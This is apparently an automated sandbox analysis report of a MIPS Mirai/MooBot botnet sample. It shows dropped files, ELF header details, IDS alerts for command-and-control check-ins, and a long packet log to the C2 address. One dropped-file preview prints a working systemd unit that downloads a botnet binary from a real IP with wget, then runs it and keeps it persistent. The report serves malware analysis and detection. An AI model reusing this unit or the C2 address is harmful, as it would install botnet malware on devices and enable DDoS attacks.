                                        No context
                                        Process:/tmp/na.elf
                                        File Type:ASCII text
                                        Category:dropped
                                        Size (bytes):297
                                        Entropy (8bit):5.057113383448013
                                        Encrypted:false
                                        SSDEEP:6:z80WuKyRZAMzdK+ann0RJ5R0J/K+GWRo3N+GWRuwuOp+GWRQCdUO9LQmWA4Rv:zNRZAOK+aniRi/K+GWRg+GWRuwjp+GWo
                                        MD5:4718C05A608A62895CB8F8FE350D3FB6
                                        SHA1:FFB5174F12EB8F312161E10163CBF843E0A19B2C
                                        SHA-256:1992117801CFE56513A1AFA968434D0FAC7209B48E6BADF6D34EC413EA390D66
                                        SHA-512:B4712F49CF45125D0105877E2A973C7363850A991D22FE72454644C25A5932097BC00AA08A4A36F81C601106AF5D30027BD181E7512FC7D509B7D7AA8EBD09E1
                                        Malicious:false
                                        Reputation:low
                                        Preview:[Unit].Description=Custom Sech Binary.After=network.target..[Service].ExecStart=/usr/bin/wget -O /tmp/bolu http://91.200.103.117/bolubotnetmips.ExecStartPost=/bin/chmod +x /tmp/bolu.ExecStartPost=/tmp/bolu (null).ExecStartPost=rm -rf /tmp/bolu.Restart=always..[Install].WantedBy=multi-user.target.
                                        Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                        File Type:ASCII text
                                        Category:dropped
                                        Size (bytes):76
                                        Entropy (8bit):3.7627880354948586
                                        Encrypted:false
                                        SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                        MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                        SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                        SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                        SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                        Process:/tmp/na.elf
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):27
                                        Entropy (8bit):3.8100810205217304
                                        Encrypted:false
                                        SSDEEP:3:TgBDlT1N:TgB11N
                                        MD5:2E8B62CD5B9D6203300E1A0F79554430
                                        SHA1:B6FC563BCA171C6DFA5A420C367F090C08635F4D
                                        SHA-256:54E95E1B4FCA83E6C469DA79E05EC42CB5F190B5731F28A9DFF280136B7DCFA6
                                        SHA-512:81AA2A256AB3B2318A60A089336AB73F5257EF7F292F18A37EC069D7FDE400763D7BFA3D89586B610C80715A2443849E679559EB14DBF7C769869AA908067541
                                        Malicious:false
                                        Reputation:low
                                        Preview:/tmp/na.elf./tmp/nwlrbbmqbh
                                        File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                        Entropy (8bit):5.085823091564988
                                        TrID:
                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                        File name:na.elf
                                        File size:186'872 bytes
                                        MD5:ecffaf9ddeb2137988036bf8d7153b67
                                        SHA1:834a8cce9907e2ce918040cef2944f5d1dcb0d08
                                        SHA256:1afd5b2da3e7a198208d882e61c3c651b7718ce9d67a4c6f0c2c882492f7eb41
                                        SHA512:10b49e818b49627df7525d832d2e69ccd6d970b94df3dfd43880698076b5e84a0bc5b9103a037b4ee4e4086fac3a97df2abe7436cf9f47acb65aabfd4c3c9749
                                        SSDEEP:3072:vPriURH2E8uPFvMLmM1GK2+BH6PvaD/8uj7Zy:vjiUR2EpFvMLnLIPq/njty
                                        TLSH:D704A61E6E228F7DF768873547B78E25975833D626E1D680E1ACC2105E6038E641FFAC
                                        File Content Preview:.ELF.....................@.`...4.........4. ...(.............@...@...........................F...F....T....<........dt.Q............................<...'.M....!'.......................<...'.L....!... ....'9... ......................<...'.L....!...$....'9W

                                        ELF header

                                        Class:ELF32
                                        Data:2's complement, big endian
                                        Version:1 (current)
                                        Machine:MIPS R3000
                                        Version Number:0x1
                                        Type:EXEC (Executable file)
                                        OS/ABI:UNIX - System V
                                        ABI Version:0
                                        Entry Point Address:0x400260
                                        Flags:0x1007
                                        ELF Header Size:52
                                        Program Header Offset:52
                                        Program Header Size:32
                                        Number of Program Headers:3
                                        Section Header Offset:186312
                                        Section Header Size:40
                                        Number of Section Headers:14
                                        Header String Table Index:13
                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                        NULL0x00x00x00x00x0000
                                        .initPROGBITS0x4000940x940x8c0x00x6AX004
                                        .textPROGBITS0x4001200x1200x257000x00x6AX0016
                                        .finiPROGBITS0x4258200x258200x5c0x00x6AX004
                                        .rodataPROGBITS0x4258800x258800x2a300x00x2A0016
                                        .ctorsPROGBITS0x4682b40x282b40xc0x00x3WA004
                                        .dtorsPROGBITS0x4682c00x282c00x80x00x3WA004
                                        .data.rel.roPROGBITS0x4682cc0x282cc0x1440x00x3WA004
                                        .dataPROGBITS0x4684200x284200x49980x00x3WA0032
                                        .gotPROGBITS0x46cdc00x2cdc00x9a40x40x10000003WAp0016
                                        .sbssNOBITS0x46d7640x2d7640x4c0x00x10000003WAp004
                                        .bssNOBITS0x46d7b00x2d7640x88400x00x3WA0016
                                        .mdebug.abi32PROGBITS0x12b40x2d7640x00x00x0001
                                        .shstrtabSTRTAB0x00x2d7640x640x00x0001
                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                        LOAD0x00x4000000x4000000x282b00x282b05.43740x5R E0x10000.init .text .fini .rodata
                                        LOAD0x282b40x4682b40x4682b40x54b00xdd3c1.20740x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-10-07T16:28:53.058288+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145843091.200.103.11723561TCP
                                        2024-10-07T16:28:58.707877+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145843291.200.103.11723561TCP
                                        2024-10-07T16:29:03.667039+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145843491.200.103.11723561TCP
                                        2024-10-07T16:29:09.389345+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145843691.200.103.11723561TCP
                                        2024-10-07T16:29:18.398905+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145843891.200.103.11723561TCP
                                        2024-10-07T16:29:27.047574+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145844091.200.103.11723561TCP
                                        2024-10-07T16:29:32.707714+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145844291.200.103.11723561TCP
                                        2024-10-07T16:29:42.335065+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145844491.200.103.11723561TCP
                                        2024-10-07T16:29:49.970562+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145844691.200.103.11723561TCP
                                        2024-10-07T16:30:00.652513+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145844891.200.103.11723561TCP
                                        2024-10-07T16:30:11.483573+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145845091.200.103.11723561TCP
                                        2024-10-07T16:30:19.141822+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145845291.200.103.11723561TCP
                                        2024-10-07T16:30:25.773355+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145845491.200.103.11723561TCP
                                        2024-10-07T16:30:32.421776+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145845691.200.103.11723561TCP
                                        2024-10-07T16:30:43.097400+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145845891.200.103.11723561TCP
                                        2024-10-07T16:30:53.732411+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145846091.200.103.11723561TCP
                                        2024-10-07T16:30:58.403261+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145846291.200.103.11723561TCP
                                        2024-10-07T16:31:04.045222+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145846491.200.103.11723561TCP
                                        2024-10-07T16:31:07.698392+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145846691.200.103.11723561TCP
                                        2024-10-07T16:31:16.376213+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145846891.200.103.11723561TCP
                                        2024-10-07T16:31:21.699517+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145847091.200.103.11723561TCP
                                        2024-10-07T16:31:29.329455+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145847291.200.103.11723561TCP
                                        2024-10-07T16:31:38.374808+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145847491.200.103.11723561TCP
                                        2024-10-07T16:31:44.860656+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145847691.200.103.11723561TCP
                                        2024-10-07T16:31:47.518777+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145847891.200.103.11723561TCP
                                        2024-10-07T16:31:59.490488+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145848091.200.103.11723561TCP
                                        2024-10-07T16:32:05.266675+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145848291.200.103.11723561TCP
                                        2024-10-07T16:32:17.530926+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.145848491.200.103.11723561TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 7, 2024 16:28:53.045645952 CEST5843023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:28:53.051034927 CEST235615843091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:28:53.051090956 CEST5843023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:28:53.058288097 CEST5843023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:28:53.063283920 CEST235615843091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:28:54.683202028 CEST235615843091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:28:54.683473110 CEST5843023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:28:54.688465118 CEST235615843091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:28:58.700006962 CEST5843223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:28:58.705019951 CEST235615843291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:28:58.705220938 CEST5843223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:28:58.707876921 CEST5843223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:28:58.712688923 CEST235615843291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:00.342438936 CEST235615843291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:00.342665911 CEST5843223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:00.347485065 CEST235615843291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:03.661434889 CEST5843423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:03.666258097 CEST235615843491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:03.666312933 CEST5843423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:03.667038918 CEST5843423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:03.671835899 CEST235615843491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:05.363563061 CEST235615843491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:05.363718987 CEST5843423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:05.368614912 CEST235615843491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:09.375307083 CEST5843623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:09.388582945 CEST235615843691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:09.388643980 CEST5843623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:09.389344931 CEST5843623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:09.395560980 CEST235615843691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:11.081109047 CEST235615843691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:11.081495047 CEST5843623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:11.086486101 CEST235615843691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:18.393275023 CEST5843823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:18.398093939 CEST235615843891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:18.398163080 CEST5843823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:18.398905039 CEST5843823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:18.403641939 CEST235615843891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:20.029997110 CEST235615843891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:20.030189037 CEST5843823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:20.034980059 CEST235615843891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:27.041836977 CEST5844023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:27.046663046 CEST235615844091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:27.046719074 CEST5844023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:27.047574043 CEST5844023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:27.052375078 CEST235615844091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:28.670756102 CEST235615844091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:28.670974016 CEST5844023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:28.675873041 CEST235615844091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:32.700525045 CEST5844223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:32.706794977 CEST235615844291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:32.706878901 CEST5844223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:32.707714081 CEST5844223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:32.712542057 CEST235615844291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:34.318603992 CEST235615844291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:34.318847895 CEST5844223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:34.323765039 CEST235615844291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:42.329243898 CEST5844423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:42.334109068 CEST235615844491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:42.334167004 CEST5844423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:42.335064888 CEST5844423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:42.339998007 CEST235615844491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:43.955106974 CEST235615844491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:43.955285072 CEST5844423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:43.962445974 CEST235615844491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:49.964760065 CEST5844623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:49.969671011 CEST235615844691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:49.969729900 CEST5844623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:49.970561981 CEST5844623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:49.975598097 CEST235615844691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:51.636986971 CEST235615844691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:29:51.637180090 CEST5844623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:29:51.642062902 CEST235615844691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:00.646703959 CEST5844823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:00.651563883 CEST235615844891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:00.651622057 CEST5844823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:00.652513027 CEST5844823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:00.657346010 CEST235615844891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:02.460935116 CEST235615844891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:02.461183071 CEST5844823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:02.465997934 CEST235615844891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:11.477080107 CEST5845023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:11.482327938 CEST235615845091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:11.482419014 CEST5845023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:11.483572960 CEST5845023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:11.489166975 CEST235615845091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:13.125699997 CEST235615845091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:13.126055956 CEST5845023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:13.130892992 CEST235615845091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:19.136034012 CEST5845223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:19.140870094 CEST235615845291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:19.140923977 CEST5845223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:19.141822100 CEST5845223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:19.146667957 CEST235615845291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:20.754127979 CEST235615845291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:20.754354000 CEST5845223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:20.759965897 CEST235615845291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:25.766993046 CEST5845423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:25.772239923 CEST235615845491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:25.772320986 CEST5845423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:25.773355007 CEST5845423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:25.778202057 CEST235615845491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:27.406132936 CEST235615845491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:27.406407118 CEST5845423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:27.411448956 CEST235615845491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:32.415976048 CEST5845623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:32.420972109 CEST235615845691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:32.421025991 CEST5845623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:32.421776056 CEST5845623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:32.429148912 CEST235615845691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:34.077115059 CEST235615845691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:34.077276945 CEST5845623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:34.082148075 CEST235615845691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:43.089871883 CEST5845823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:43.096326113 CEST235615845891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:43.096394062 CEST5845823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:43.097399950 CEST5845823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:43.103830099 CEST235615845891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:44.715646029 CEST235615845891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:44.715941906 CEST5845823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:44.720849037 CEST235615845891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:53.726217031 CEST5846023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:53.731331110 CEST235615846091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:53.731393099 CEST5846023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:53.732410908 CEST5846023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:53.737235069 CEST235615846091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:55.385283947 CEST235615846091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:55.385448933 CEST5846023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:55.392827034 CEST235615846091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:58.397192955 CEST5846223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:58.402089119 CEST235615846291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:30:58.402143002 CEST5846223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:58.403260946 CEST5846223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:30:58.408150911 CEST235615846291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:00.028121948 CEST235615846291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:00.028341055 CEST5846223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:00.033268929 CEST235615846291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:04.039277077 CEST5846423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:04.044231892 CEST235615846491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:04.044285059 CEST5846423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:04.045222044 CEST5846423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:04.049993992 CEST235615846491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:05.682790041 CEST235615846491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:05.682971954 CEST5846423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:05.687905073 CEST235615846491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:07.692867994 CEST5846623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:07.697702885 CEST235615846691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:07.697747946 CEST5846623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:07.698391914 CEST5846623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:07.703268051 CEST235615846691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:09.358160973 CEST235615846691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:09.358551025 CEST5846623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:09.363827944 CEST235615846691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:16.370265007 CEST5846823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:16.375399113 CEST235615846891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:16.375489950 CEST5846823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:16.376213074 CEST5846823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:16.381108046 CEST235615846891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:18.683715105 CEST235615846891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:18.683890104 CEST5846823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:18.683890104 CEST5846823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:18.684845924 CEST235615846891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:18.684899092 CEST5846823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:18.686017036 CEST235615846891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:18.686057091 CEST5846823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:18.690016985 CEST235615846891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:21.693738937 CEST5847023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:21.698666096 CEST235615847091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:21.698750973 CEST5847023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:21.699517012 CEST5847023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:21.704459906 CEST235615847091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:23.314002991 CEST235615847091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:23.314202070 CEST5847023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:23.319078922 CEST235615847091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:29.323926926 CEST5847223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:29.328833103 CEST235615847291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:29.328886032 CEST5847223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:29.329454899 CEST5847223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:29.334379911 CEST235615847291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:30.935009003 CEST235615847291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:30.935303926 CEST5847223561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:30.940385103 CEST235615847291.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:38.118824005 CEST5847423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:38.123742104 CEST235615847491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:38.123800993 CEST5847423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:38.374808073 CEST5847423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:38.379622936 CEST235615847491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:39.844716072 CEST235615847491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:39.844867945 CEST5847423561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:39.849700928 CEST235615847491.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:44.854830027 CEST5847623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:44.859985113 CEST235615847691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:44.860038996 CEST5847623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:44.860656023 CEST5847623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:44.865478039 CEST235615847691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:46.499381065 CEST235615847691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:46.499594927 CEST5847623561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:46.515489101 CEST235615847691.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:47.512934923 CEST5847823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:47.517978907 CEST235615847891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:47.518062115 CEST5847823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:47.518776894 CEST5847823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:47.523643017 CEST235615847891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:49.473634958 CEST235615847891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:49.473812103 CEST5847823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:49.473917961 CEST235615847891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:49.473970890 CEST5847823561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:49.478671074 CEST235615847891.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:59.484180927 CEST5848023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:59.489130974 CEST235615848091.200.103.117192.168.2.14
                                        Oct 7, 2024 16:31:59.489197969 CEST5848023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:59.490488052 CEST5848023561192.168.2.1491.200.103.117
                                        Oct 7, 2024 16:31:59.495296955 CEST235615848091.200.103.117192.168.2.14
